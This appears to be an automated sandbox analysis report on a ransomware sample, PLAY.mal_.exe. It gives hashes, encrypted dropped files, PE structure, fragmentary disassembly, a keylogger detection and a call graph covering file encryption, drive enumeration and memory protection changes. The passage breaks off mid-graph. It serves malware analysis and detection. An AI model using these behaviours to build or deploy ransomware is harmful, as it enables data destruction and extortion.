        Preview:A;'.X........0.......!.......I..5.N......s...i....?h.@...Dt.Z...T..U.|.!.I>.............................o(....,V..r.l8.?..k......2........1.e+?.2...gmZ..'.....[Dz...g.FU.W.c.?..._..6..z?...y.m.....P.e...a`..XN.]...............}._x6h..(.d........l~....1....bj.v2[KW..*.S...VW.ALTH}.k..k....$8m.A.8.i...NV_.x..].........:..c.....C..sv;.....}...g.......T.A.PR.......\......._/..j.....YvYc.Y...\s..%."..XM..<.e...........m.1B......q.j..+..n75f.svF~.lS......f...S......I#$....0*......g.....V@F.....t..g*91..u.3......Z.....<..c#.+..O....-a."..]o(....R.\..3.:......x.....a..]Or.D..oz.s(~=..d.-v2M.>.4.u....~l..6...-..."/.N....T.Fo5.>..0.L.V...].Oj.>.><....#Qgm.Q..6}Bn....z.....4......3..........0.Eq..JN.... !.c?..@.U..1+.c..Us..oo....._.#...u3a.g...z..$..=v>:.*.`BFIT.,..k.....X.H......%(.cJ...O.....f.$..).9&...:.vVWU...-....}.j.$l6..T",.q.&.|r.l.6...2....G....1Qf...x....{.H..fG...#.qh..z.v...0.1..Lj,...(..g..}.o..j.+....X............0.A.E..m

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29752
        Entropy (8bit):7.993708815769276
        Encrypted:true
        SSDEEP:
        MD5:59F38B3EA6DED3674A3594AA7D61B404
        SHA1:DEA174AEFF899957DF444A739E0ECD7A38D0DD0C
        SHA-256:623F8B1AEE08CB98AEFBD8106BED2D1972EB8ED94DFE4CEEC82896B8F3ABEB66
        SHA-512:D049B7F17D9DF1D71831E4792E1AC99A147450B588807908441D56DFC7C1D5C8F8736C1EE2E6C9B5FB6442A71644D7C5EE56AB294EA620F6261A2E768CD4D5F8
        Malicious:true
        Preview:;'...14&......K.D..z.(......].d.VD.s2.)0w.x....6X......o...........Z.D..~&V4....q...}o...RN1}.y....|...hy..Wfv..|......K5..y.V...}.y|[.K.K..p.E.....tw....aG..{I...k.fG.7..'.....f-[`..&...`...U......U...k..U.. .`..o..R.R........m..$..P..J~.Kz.....;#..2..M.vU%.~...$......`..,..Y.6^....0.@`.NF.I......!.K...Z...$&r'O..{.h-..P.q...F..kz.}.#..*.yr..D..Q .....{e....T.k\.Q..tJ.'..2.pw_.c..6c...D.....1..~:.8.a&u.A_....m.!?j.Y..3..1Z.....,..`......!t.....JVe...9y.<...h.f.W....Cz....;@W.......wY..KGk...?.*i....V.}L.go.l........q2d.b.C.........K.y....k..r......o..-.c..r.....8N`.X...c..O..1.P.....z...`:b....)..G.M...,/p..wp.;.c.....!Q...>.....*.M...'5.C;h...`e%..!..1)..h...).....1]M..*%.......Q..l1\3..m.Y..&.=Ea..pG...k...q.o..W.4....V.|./..*.hL"+.:..q...Q..U..<.zv'.JXb..v.V.....)..f.$...\!E......I.K^5......<.U..0.'.v. ....7.........$f.........\F4=1=...r.I...l0.-.z...U...u.d.H...up?..`.]..!C.I98...-.........J.&-.!S'..wEl6.#...^.;.e..NYL..(.|A.#Q+.....N.

        C:\bootTel.dat

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1160
        Entropy (8bit):7.77262788485157
        Encrypted:false
        SSDEEP:
        MD5:D5110A91B570CA40BD734DA1AD9CD83E
        SHA1:BDA60DBBC86779428B128BAFB84095C42DDF4D98
        SHA-256:85B68E121DF5073D5819A4660A7C4D56C1D17DEE5DAC2E2161A09E125B60B113
        SHA-512:726473CDD33D7450D02B40CF8CE9728424E826CDA405CCF4A88382EC9CB388D687DAB45F77DC00F6C2DC935D79A595C824B02E9DB3A16F71EF01BD28D9A2DF61
        Malicious:false
        Preview:.h..v.c......D.E.V.L...p.e..~.......2../s.`ePb.-UD.R.o"A(..k.....b.P..f.{.[.....ID.............T..U.|.!.I>................................x..o.@x.....{.u.hj.{.a...Y.bs#:......T.;8.I...3.b(I....?.o.....X..W..~.O.n.B.x....b..i5.?w+..,D/..2...n....d...7.a.o..^..K.U................5H..)\.f...DW..!.l?v..K"|..P.w..M....>.siL...@...;!..>..4..\.....P..=..Q..{).d`.....=G..X\.X..Hc.......9*,.y....3.*k..l'v...v...WH.+..R0 HJ...(.{3..)9.R;1...X..Nh.gpR^i.Z..;.>...Y@B.}.1...4.E+.XE.....J..e.........6..<....u...S!.n"...c7.o..U.o.d!z.AS.?.T.w.....a.#!F..........?.]O....q.h........4..[.....'...t..S.....mk..C.f.@z..)n.2Y..^..)...c7....\..}u>..O..VK.........QEG..5q~.b;....l.$..W.P9.....E...8..J`Eh*.W.}......w..E#.n.._.v.,.\UZDg.....X....U.?p..=D..G*z..~..[.D.m........4...[.G...)/..N.....L...\R.%?..sv....."^9..bW.C..-!f..=.d.$H>..-......d.H.z...'../...-...fK......R..U....:..\......;<.,1/{.....~.....Y...pv.{.P...,....m......Y.....R..U...5.".!0w..8..JS.

        C:\bootTel.dat.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1160
        Entropy (8bit):7.77262788485157
        Encrypted:false
        SSDEEP:
        MD5:D5110A91B570CA40BD734DA1AD9CD83E
        SHA1:BDA60DBBC86779428B128BAFB84095C42DDF4D98
        SHA-256:85B68E121DF5073D5819A4660A7C4D56C1D17DEE5DAC2E2161A09E125B60B113
        SHA-512:726473CDD33D7450D02B40CF8CE9728424E826CDA405CCF4A88382EC9CB388D687DAB45F77DC00F6C2DC935D79A595C824B02E9DB3A16F71EF01BD28D9A2DF61
        Malicious:false
        Preview:.h..v.c......D.E.V.L...p.e..~.......2../s.`ePb.-UD.R.o"A(..k.....b.P..f.{.[.....ID.............T..U.|.!.I>................................x..o.@x.....{.u.hj.{.a...Y.bs#:......T.;8.I...3.b(I....?.o.....X..W..~.O.n.B.x....b..i5.?w+..,D/..2...n....d...7.a.o..^..K.U................5H..)\.f...DW..!.l?v..K"|..P.w..M....>.siL...@...;!..>..4..\.....P..=..Q..{).d`.....=G..X\.X..Hc.......9*,.y....3.*k..l'v...v...WH.+..R0 HJ...(.{3..)9.R;1...X..Nh.gpR^i.Z..;.>...Y@B.}.1...4.E+.XE.....J..e.........6..<....u...S!.n"...c7.o..U.o.d!z.AS.?.T.w.....a.#!F..........?.]O....q.h........4..[.....'...t..S.....mk..C.f.@z..)n.2Y..^..)...c7....\..}u>..O..VK.........QEG..5q~.b;....l.$..W.P9.....E...8..J`Eh*.W.}......w..E#.n.._.v.,.\UZDg.....X....U.?p..=D..G*z..~..[.D.m........4...[.G...)/..N.....L...\R.%?..sv....."^9..bW.C..-!f..=.d.$H>..-......d.H.z...'../...-...fK......R..U....:..\......;<.,1/{.....~.....Y...pv.{.P...,....m......Y.....R..U...5.".!0w..8..JS.

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):6.681707525912978
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:PLAY.mal_.exe
        File size:182784
        MD5:223eff1610b432a1f1aa06c60bd7b9a6
        SHA1:14177730443c65aefeeda3162b324fdedf9cf9e0
        SHA256:006ae41910887f0811a3ba2868ef9576bbd265216554850112319af878f06e55
        SHA512:cf8b097e4d8dae444c4759a6588bcc5769694d34675f17fed5ee6d0b7aa52ed44263b0cc73f4ff422182a01ad8d69b18a71110c4fc4e9dd2233e9cfe833cbd36
        SSDEEP:3072:Yrl2uRkddO+iR7OZOQ+dzeIP9mwUGU3l2bxW1/9JnOC/fhKJ2hXh3lmG:22uyqOh2g8U12K9dtEWx17
        TLSH:F2047D16A7B1D075E4B6847026E98EF1CE693B320F01C8EF6781176959325E2E135F3B
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E.X.$...$...$...L...$...L..3$...L...$...L...$...L...$...L...$...L...$...$...$...M...$...M...$..Rich.$.........................

        File Icon

        Icon Hash:00828e8e8686b000

        Static PE Info

        General

        Entrypoint:0x417ea3
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x62F05D12 [Mon Aug 8 00:47:14 2022 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:bfaffd974eb97f13ae5b4b98aa20c81e

        Entrypoint Preview

        Instruction
        call 00007F2DB8718A31h
        jmp 00007F2DB87185BFh
        push ebp
        mov ebp, esp
        mov eax, dword ptr [0042B004h]
        and eax, 1Fh
        push 00000020h
        pop ecx
        sub ecx, eax
        mov eax, dword ptr [ebp+08h]
        ror eax, cl
        xor eax, dword ptr [0042B004h]
        pop ebp
        ret
        push ebp
        mov ebp, esp
        mov eax, dword ptr [ebp+08h]
        push esi
        mov ecx, dword ptr [eax+3Ch]
        add ecx, eax
        movzx eax, word ptr [ecx+14h]
        lea edx, dword ptr [ecx+18h]
        add edx, eax
        movzx eax, word ptr [ecx+06h]
        imul esi, eax, 28h
        add esi, edx
        cmp edx, esi
        je 00007F2DB871875Bh
        mov ecx, dword ptr [ebp+0Ch]
        cmp ecx, dword ptr [edx+0Ch]
        jc 00007F2DB871874Ch
        mov eax, dword ptr [edx+08h]
        add eax, dword ptr [edx+0Ch]
        cmp ecx, eax
        jc 00007F2DB871874Eh
        add edx, 28h
        cmp edx, esi
        jne 00007F2DB871872Ch
        xor eax, eax
        pop esi
        pop ebp
        ret
        mov eax, edx
        jmp 00007F2DB871873Bh
        push esi
        call 00007F2DB8718EC3h
        test eax, eax
        je 00007F2DB8718762h
        mov eax, dword ptr fs:[00000018h]
        mov esi, 0042CDB0h
        mov edx, dword ptr [eax+04h]
        jmp 00007F2DB8718746h
        cmp edx, eax
        je 00007F2DB8718752h
        xor eax, eax
        mov ecx, edx
        lock cmpxchg dword ptr [esi], ecx
        test eax, eax
        jne 00007F2DB8718732h
        xor al, al
        pop esi
        ret
        mov al, 01h
        pop esi
        ret
        push ebp
        mov ebp, esp
        cmp dword ptr [ebp+08h], 00000000h
        jne 00007F2DB8718749h
        mov byte ptr [0042CDB4h], 00000001h
        call 00007F2DB8718CEBh
        call 00007F2DB8719352h
        test al, al
        jne 00007F2DB8718746h
        xor al, al
        pop ebp
        ret
        call 00007F2DB871BF6Ch
        test al, al
        jne 00007F2DB871874Ch

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x2a8c40x28.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000x1638.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x2a1d00x38.rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2a2080x40.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x240000x104.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x221450x22200False0.613846440018315data6.744506431104587IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x240000x6e8e0x7000False0.47984095982142855data4.945197895884443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x2b0000x27500x1c00False0.25948660714285715data4.439440123336567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .reloc0x2e0000x16380x1800False0.7708333333333334data6.423094865560977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Imports

        DLLImport
        KERNEL32.dllGetLastError, GetProcAddress, Sleep, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

        Network Behavior

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Sep 1, 2022 23:19:42.312827110 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:19:42.337165117 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:20:07.759740114 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:20:07.777781963 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:20:30.524529934 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:20:30.527321100 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:20:50.520207882 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:20:50.526673079 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:21:12.758860111 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:21:12.764676094 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:21:34.058525085 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:21:34.109307051 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:21:53.837146044 CEST60626274192.168.2.3192.168.2.1
        Sep 1, 2022 23:21:53.857904911 CEST60626274192.168.2.3192.168.2.1

        ICMP Packets

        TimestampSource IPDest IPChecksumCodeType
        Sep 1, 2022 23:19:32.799357891 CEST192.168.2.3192.168.2.1cec9Echo
        Sep 1, 2022 23:19:32.799431086 CEST192.168.2.1192.168.2.3d6c9Echo Reply
        Sep 1, 2022 23:19:42.312905073 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:19:42.337223053 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:19:57.405159950 CEST192.168.2.3192.168.2.1cdfeEcho
        Sep 1, 2022 23:19:57.405203104 CEST192.168.2.1192.168.2.3d5feEcho Reply
        Sep 1, 2022 23:20:07.759836912 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:20:07.777854919 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:20:22.446391106 CEST192.168.2.3192.168.2.1cd03Echo
        Sep 1, 2022 23:20:22.446455956 CEST192.168.2.1192.168.2.3d503Echo Reply
        Sep 1, 2022 23:20:30.524578094 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:20:30.527390003 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:20:45.756715059 CEST192.168.2.3192.168.2.1cc06Echo
        Sep 1, 2022 23:20:45.756772041 CEST192.168.2.1192.168.2.3d406Echo Reply
        Sep 1, 2022 23:20:50.520282030 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:20:50.526707888 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:21:06.824150085 CEST192.168.2.3192.168.2.1cb09Echo
        Sep 1, 2022 23:21:06.824199915 CEST192.168.2.1192.168.2.3d309Echo Reply
        Sep 1, 2022 23:21:12.758925915 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:21:12.764714956 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:21:28.139507055 CEST192.168.2.3192.168.2.1ca0cEcho
        Sep 1, 2022 23:21:28.139592886 CEST192.168.2.1192.168.2.3d20cEcho Reply
        Sep 1, 2022 23:21:34.058574915 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:21:34.109369993 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:21:49.144785881 CEST192.168.2.3192.168.2.1c90fEcho
        Sep 1, 2022 23:21:49.144834042 CEST192.168.2.1192.168.2.3d10fEcho Reply
        Sep 1, 2022 23:21:53.837203026 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:21:53.857955933 CEST192.168.2.1192.168.2.38307(Port unreachable)Destination Unreachable
        Sep 1, 2022 23:22:08.785002947 CEST192.168.2.3192.168.2.1c812Echo
        Sep 1, 2022 23:22:08.785059929 CEST192.168.2.1192.168.2.3d012Echo Reply
        Sep 1, 2022 23:22:25.656336069 CEST192.168.2.3192.168.2.1c6d6Echo
        Sep 1, 2022 23:22:25.656409025 CEST192.168.2.1192.168.2.3ced6Echo Reply

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Target ID:0
        Start time:23:18:57
        Start date:01/09/2022
        Path:C:\Users\user\Desktop\PLAY.mal_.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\PLAY.mal_.exe"
        Imagebase:0xae0000
        File size:182784 bytes
        MD5 hash:223EFF1610B432A1F1AA06C60BD7B9A6
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.380476408.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
        Reputation:low

        Disassembly

        Reset < >

          Execution Graph

          Execution Coverage:19.2%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:11.3%
          Total number of Nodes:1838
          Total number of Limit Nodes:144
          execution_graph 12481 aeecaf 12485 aedec0 12481->12485 12483 aeecbc WNetGetUniversalNameW 12484 aeecce 12483->12484 12486 aedee1 12485->12486 12503 ae1cac 12504 ae1cce 12503->12504 12505 ae1d39 12504->12505 12510 ae1ce2 12504->12510 12532 aee070 12505->12532 12507 ae1d49 12508 ae1d58 12507->12508 12512 ae1d73 12507->12512 12511 af7b30 _ValidateLocalCookies 5 API calls 12508->12511 12509 ae1cfe 12510->12509 12514 af7b30 _ValidateLocalCookies 5 API calls 12510->12514 12513 ae1d6f 12511->12513 12515 ae1dbe 12512->12515 12516 ae1d9f 12512->12516 12517 ae1d35 12514->12517 12518 ae2431 12515->12518 12529 ae1dd7 12515->12529 12519 af7b30 _ValidateLocalCookies 5 API calls 12516->12519 12521 af7b30 _ValidateLocalCookies 5 API calls 12518->12521 12520 ae1dba 12519->12520 12522 ae244e 12521->12522 12523 ae2372 12524 af7b30 _ValidateLocalCookies 5 API calls 12523->12524 12525 ae238f 12524->12525 12526 ae1e87 GetProcAddress 12526->12529 12527 ae240c 12530 af7b30 _ValidateLocalCookies 5 API calls 12527->12530 12528 afa1c0 25 API calls 12528->12529 12529->12523 12529->12526 12529->12527 12529->12528 12531 ae242d 12530->12531 12533 aee08b 12532->12533 12534 aee061 12533->12534 12535 aee0eb VirtualAlloc 12533->12535 12536 aee09e 12534->12536 12537 af7b30 _ValidateLocalCookies 5 API calls 12534->12537 12535->12507 12536->12507 12538 aee06c 12537->12538 12538->12507 12835 af31ad 12836 af31b0 12835->12836 12837 af31e4 12836->12837 12838 af7b30 _ValidateLocalCookies 5 API calls 12836->12838 12838->12837 12839 aeeaab 12840 aedec0 12839->12840 12841 aeeabb K32EnumProcessModules 12840->12841 12842 aeeacb 12841->12842 15074 af3ea9 15080 af3e4a 15074->15080 15075 af3ebf 15076 af3ec9 IcmpCloseHandle 15075->15076 15077 af7b30 _ValidateLocalCookies 5 API calls 15076->15077 15078 af3ede 15077->15078 15079 afa6ee ___vcrt_freefls@4 14 API calls 15079->15080 15080->15075 15080->15079 12879 aee1a6 VirtualFree 13466 ae25b4 13467 ae25ba 13466->13467 13467->13467 13468 ae25d2 K32GetModuleFileNameExA 13467->13468 13469 ae25f0 13468->13469 13478 ae2570 13468->13478 13470 ae1280 42 API calls 13469->13470 13471 ae2601 13470->13471 13471->13478 13481 ae1ac0 13471->13481 13474 ae2676 13475 ae27b4 13476 af7b30 _ValidateLocalCookies 5 API calls 13475->13476 13477 ae27c3 13476->13477 13478->13474 13479 af7b30 _ValidateLocalCookies 5 API calls 13478->13479 13480 ae281a 13479->13480 13482 ae1aa8 13481->13482 13483 ae1ab4 13482->13483 13484 af7b30 _ValidateLocalCookies 5 API calls 13482->13484 13483->13475 13483->13478 13484->13483 13489 af048e 13490 aedec0 13489->13490 13491 af04c2 Sleep 13490->13491 13518 aee28a 13519 aedec0 13518->13519 13520 aee2ba CreateFileW 13519->13520 13521 af1b89 13522 aedec0 13521->13522 13523 af1bb9 GetAdaptersInfo 13522->13523 13524 af1bc7 13523->13524 13525 af3b83 13526 af3ba1 13525->13526 13527 af3bac 13526->13527 13528 af3be3 13526->13528 13531 af7b30 _ValidateLocalCookies 5 API calls 13527->13531 13533 aef3a0 13528->13533 13530 af3c16 13532 af3bdd 13531->13532 13534 aef361 13533->13534 13535 aef385 socket 13534->13535 13536 aef3db 13534->13536 13535->13530 13536->13530 13537 aee980 13538 aee98b 13537->13538 13541 aee90e 13537->13541 13539 aee99d SetVolumeMountPointWStub 13538->13539 13540 aee9a8 13539->13540 13542 aeea37 VirtualProtect 13541->13542 13543 aee8dd 13541->13543 15114 ae4a81 15115 ae4a85 15114->15115 15116 ae4a19 15115->15116 15117 ae4a8d 15115->15117 15118 af7b30 _ValidateLocalCookies 5 API calls 15116->15118 15120 ae4a47 15116->15120 15121 ae4b3e 15117->15121 15122 ae4b28 15117->15122 15119 ae4a43 15118->15119 15124 aee380 ReadFile 15121->15124 15123 af7b30 _ValidateLocalCookies 5 API calls 15122->15123 15125 ae4b3a 15123->15125 15126 ae4b7a 15124->15126 15127 ae4b97 15126->15127 15128 ae4b81 15126->15128 15131 ae4bbd 15127->15131 15132 ae4bd3 15127->15132 15129 af7b30 _ValidateLocalCookies 5 API calls 15128->15129 15130 ae4b93 15129->15130 15133 af7b30 _ValidateLocalCookies 5 API calls 15131->15133 15135 ae4bed 15132->15135 15136 ae4c03 15132->15136 15134 ae4bcf 15133->15134 15138 af7b30 _ValidateLocalCookies 5 API calls 15135->15138 15137 aee380 ReadFile 15136->15137 15140 ae4c14 15137->15140 15139 ae4bff 15138->15139 15141 ae4c1b 15140->15141 15142 ae4c31 15140->15142 15143 af7b30 _ValidateLocalCookies 5 API calls 15141->15143 15145 af7b30 _ValidateLocalCookies 5 API calls 15142->15145 15144 ae4c2d 15143->15144 15146 ae4c63 15145->15146 14371 af249a 14372 af2433 14371->14372 14373 af24a1 14371->14373 14374 aee070 6 API calls 14373->14374 14375 af255b 14374->14375 14376 af2567 14375->14376 14381 af257b 14375->14381 14377 af7b30 _ValidateLocalCookies 5 API calls 14376->14377 14379 af2577 14377->14379 14378 af7b30 _ValidateLocalCookies 5 API calls 14380 af2695 14378->14380 14381->14378 13671 ae14ec 13672 aee070 6 API calls 13671->13672 13673 ae1521 13672->13673 13674 ae154c 13673->13674 13675 ae1538 13673->13675 13677 aee070 6 API calls 13674->13677 13676 af7b30 _ValidateLocalCookies 5 API calls 13675->13676 13678 ae1548 13676->13678 13679 ae1577 13677->13679 13680 ae15a9 13679->13680 13681 ae1584 13679->13681 13682 aee070 6 API calls 13680->13682 13684 af7b30 _ValidateLocalCookies 5 API calls 13681->13684 13683 ae15c0 13682->13683 13686 ae15cf 13683->13686 13690 ae15fd 13683->13690 13685 ae15a5 13684->13685 13687 af7b30 _ValidateLocalCookies 5 API calls 13686->13687 13688 ae15f9 13687->13688 13689 ae164a 13690->13689 13691 af7b30 _ValidateLocalCookies 5 API calls 13690->13691 13692 ae1646 13691->13692 13693 ae9bec 13696 ae9b98 13693->13696 13694 ae9bfc 13695 afa596 25 API calls 13695->13696 13696->13694 13696->13695 13697 aea0e4 13696->13697 13700 ae9c08 GetDriveTypeW 13696->13700 13701 afa532 25 API calls 13696->13701 13698 af7b30 _ValidateLocalCookies 5 API calls 13697->13698 13699 aea14a 13698->13699 13700->13696 13701->13696 15362 aebbeb 15365 aebc08 _wcsstr 15362->15365 15363 af7b30 _ValidateLocalCookies 5 API calls 15364 aebe79 15363->15364 15366 aee070 6 API calls 15365->15366 15375 aebda9 15365->15375 15367 aebd69 15366->15367 15368 aebd89 15367->15368 15369 aebd75 15367->15369 15370 afa532 25 API calls 15368->15370 15371 af7b30 _ValidateLocalCookies 5 API calls 15369->15371 15372 aebd9b 15370->15372 15373 aebd85 15371->15373 15374 afa596 25 API calls 15372->15374 15374->15375 15375->15363 13702 af26e9 13703 af2864 13702->13703 13704 af7b30 _ValidateLocalCookies 5 API calls 13703->13704 13706 af287c __aulldiv 13703->13706 13705 af2878 13704->13705 13707 aee3e7 13708 aee437 WriteFile 13707->13708 13709 aee3eb 13707->13709 13709->13708 13709->13709 13710 ae4ae5 13711 ae4a7d 13710->13711 13712 ae4a19 13711->13712 13713 ae4a8d 13711->13713 13714 ae4a47 13712->13714 13717 af7b30 _ValidateLocalCookies 5 API calls 13712->13717 13715 ae4b3e 13713->13715 13716 ae4b28 13713->13716 13743 aee380 13715->13743 13718 af7b30 _ValidateLocalCookies 5 API calls 13716->13718 13719 ae4a43 13717->13719 13721 ae4b3a 13718->13721 13722 ae4b7a 13723 ae4b97 13722->13723 13724 ae4b81 13722->13724 13727 ae4bbd 13723->13727 13728 ae4bd3 13723->13728 13725 af7b30 _ValidateLocalCookies 5 API calls 13724->13725 13726 ae4b93 13725->13726 13729 af7b30 _ValidateLocalCookies 5 API calls 13727->13729 13731 ae4bed 13728->13731 13732 ae4c03 13728->13732 13730 ae4bcf 13729->13730 13734 af7b30 _ValidateLocalCookies 5 API calls 13731->13734 13733 aee380 ReadFile 13732->13733 13736 ae4c14 13733->13736 13735 ae4bff 13734->13735 13737 ae4c1b 13736->13737 13738 ae4c31 13736->13738 13739 af7b30 _ValidateLocalCookies 5 API calls 13737->13739 13741 af7b30 _ValidateLocalCookies 5 API calls 13738->13741 13740 ae4c2d 13739->13740 13742 ae4c63 13741->13742 13744 aee39f 13743->13744 13745 aee367 ReadFile 13744->13745 13746 aee3c4 13744->13746 13745->13722 13758 aea9fd 13759 aeaa07 13758->13759 13770 afa520 13759->13770 13761 aeaa1d 13762 afa532 25 API calls 13761->13762 13763 aeaa91 13762->13763 13765 aeab20 13763->13765 13769 aeab33 13763->13769 13773 aee910 13763->13773 13777 afa4ff 13765->13777 13766 af7b30 _ValidateLocalCookies 5 API calls 13768 aead7d 13766->13768 13769->13766 13771 afbf33 pre_c_initialization 37 API calls 13770->13771 13772 afa52a 13771->13772 13772->13761 13774 aee90e 13773->13774 13774->13773 13775 aee8dd 13774->13775 13776 aeea37 VirtualProtect 13774->13776 13775->13763 13776->13763 13778 afbf33 pre_c_initialization 37 API calls 13777->13778 13779 afa504 13778->13779 13779->13769 13780 aebdfd MoveFileW 13781 aebe17 13780->13781 13784 aebe2d 13780->13784 13782 af7b30 _ValidateLocalCookies 5 API calls 13781->13782 13783 aebe29 13782->13783 13784->13784 13785 af7b30 _ValidateLocalCookies 5 API calls 13784->13785 13786 aebe79 13785->13786 13803 afbdfa 13804 afbe05 13803->13804 13808 afbe15 13803->13808 13809 afbe1b 13804->13809 13807 afc2ce _free 14 API calls 13807->13808 13810 afbe36 13809->13810 13811 afbe30 13809->13811 13813 afc2ce _free 14 API calls 13810->13813 13812 afc2ce _free 14 API calls 13811->13812 13812->13810 13814 afbe42 13813->13814 13815 afc2ce _free 14 API calls 13814->13815 13816 afbe4d 13815->13816 13817 afc2ce _free 14 API calls 13816->13817 13818 afbe58 13817->13818 13819 afc2ce _free 14 API calls 13818->13819 13820 afbe63 13819->13820 13821 afc2ce _free 14 API calls 13820->13821 13822 afbe6e 13821->13822 13823 afc2ce _free 14 API calls 13822->13823 13824 afbe79 13823->13824 13825 